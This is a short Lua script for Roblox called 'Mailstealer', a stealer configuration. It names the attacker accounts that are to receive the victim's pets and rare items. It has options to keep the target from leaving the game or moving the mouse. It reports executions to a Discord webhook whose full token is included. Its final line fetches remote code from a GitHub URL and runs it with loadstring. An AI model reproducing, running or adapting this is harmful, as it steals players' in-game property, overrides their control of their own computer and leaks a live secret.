--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
UserName = "just_4196" --// Username To Send Pets To
UserName2 = "just_4196" --// To Send Rare Stuff

_G.LoadingScreen = false --// make it true for loading screen
_G.AntiLeave = false --// Doesn't Let The Target Close Roblox
_G.MouseLock = false --// Doesn't Let the Target Move Mouse

--[[ Webhook Config ]]--
Webhook = "https://discord.com/api/webhooks/1122820210362171392/9gqyZhj5nsYwssIGP_1oW5b3IZ2P-9VdRGpEFGWOmID0Md58lFtMJKtmRK7AFXTxSfc8" --// Discord Webhook For Executions

--[[ Script ]]--
loadstring(game:HttpGet("https://raw.githubusercontent.com/LucidHacker9999/Mailstealer/main/script.lua"))()
